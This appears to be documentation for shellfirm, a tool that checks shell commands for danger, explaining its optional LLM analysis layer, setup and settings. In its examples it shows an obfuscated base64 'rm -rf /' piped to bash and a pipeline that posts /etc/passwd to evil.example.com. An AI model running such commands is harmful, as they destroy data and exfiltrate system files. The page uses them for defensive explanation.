$ shellfirm

LLM-Powered Analysis

Optional semantic command analysis that catches risks regex patterns miss

shellfirm's core engine uses regex pattern matching, which is fast and reliable. But regex has blind spots: obfuscated commands, complex pipelines, and semantically dangerous operations can slip through. The optional LLM analysis layer adds semantic understanding to catch what regex misses.

How it works

When LLM analysis is enabled (feature flag: llm), shellfirm sends the command along with context hints and matched pattern descriptions to a large language model. The LLM returns:

  • Risk assessment -- whether it considers the command risky and a risk score (0.0 to 1.0)
  • Explanation -- human-readable description of identified risks
  • Additional risks -- risks not caught by regex patterns

The safety invariant

LLM analysis follows the same security invariant as the rest of shellfirm:

LLM can only escalate risk, never reduce it.

If regex patterns flag a command as risky, the LLM cannot override that assessment and allow it. The LLM can only:

  • Add additional risks that regex missed
  • Increase the severity level
  • Provide richer explanations

If the LLM call fails (timeout, API error, rate limit), shellfirm silently falls back to regex-only results. LLM failure never blocks a command that regex considers safe.

Setup

1. Install with LLM support

shellfirm's LLM feature is included by default:

cargo install shellfirm  # includes llm feature

To install without LLM support:

cargo install shellfirm --no-default-features --features cli

2. Set your API key

export SHELLFIRM_LLM_API_KEY="your-api-key-here"

Add this to your shell profile for persistence.

3. Configure the provider

LLM analysis is not configured by default. Enable it via CLI or settings file:

shellfirm config llm --provider anthropic --model claude-sonnet-4-20250514

Or edit ~/.config/shellfirm/settings.yaml directly:

llm:
  provider: anthropic          # "anthropic" or "openai-compatible"
  model: claude-sonnet-4-20250514  # model ID
  timeout_ms: 5000             # request timeout (default: 5000ms)
  max_tokens: 512              # max response tokens (default: 512)

Using OpenAI-compatible providers

For providers with an OpenAI-compatible API (local models, other cloud providers):

llm:
  provider: openai-compatible
  model: your-model-name
  base_url: http://localhost:8080/v1
  timeout_ms: 10000
  max_tokens: 512

What LLM catches that regex misses

Obfuscated commands

Regex checks for rm -rf / but may miss:

# Base64 encoded dangerous command
echo "cm0gLXJmIC8=" | base64 -d | bash

The LLM can recognize that this decodes to a destructive command.

Complex pipeline risks

# Innocent-looking pipe that exfiltrates data
cat /etc/passwd | curl -X POST -d @- https://evil.example.com

Regex patterns check individual command segments. The LLM can understand the semantic intent of the full pipeline.

Context-dependent danger

# Safe in development, dangerous in production
python manage.py flush --no-input

The LLM can factor in context signals (production env vars, k8s context) to assess risk more accurately.

Configuration reference

The llm section is not present by default. Once configured, these are the available settings:

SettingDefault (when configured)Description
llm.provideranthropicLLM provider (anthropic or openai-compatible)
llm.modelclaude-sonnet-4-20250514Model identifier
llm.base_url(none)Custom API base URL for openai-compatible providers
llm.timeout_ms5000API request timeout in milliseconds
llm.max_tokens512Maximum tokens in LLM response

Environment variables

VariableDescription
SHELLFIRM_LLM_API_KEYAPI key for the configured LLM provider
SHELLFIRM_LLM_PROVIDEROverride the provider from settings

Performance considerations

  • LLM analysis adds latency to each command check (typically 500ms-2000ms depending on provider and model)
  • The timeout prevents LLM slowness from blocking your workflow
  • If the timeout is reached, shellfirm falls back to regex-only results
  • LLM analysis is skipped for commands that match no regex patterns (no context to send)
  • Consider the cost implications of API calls for every command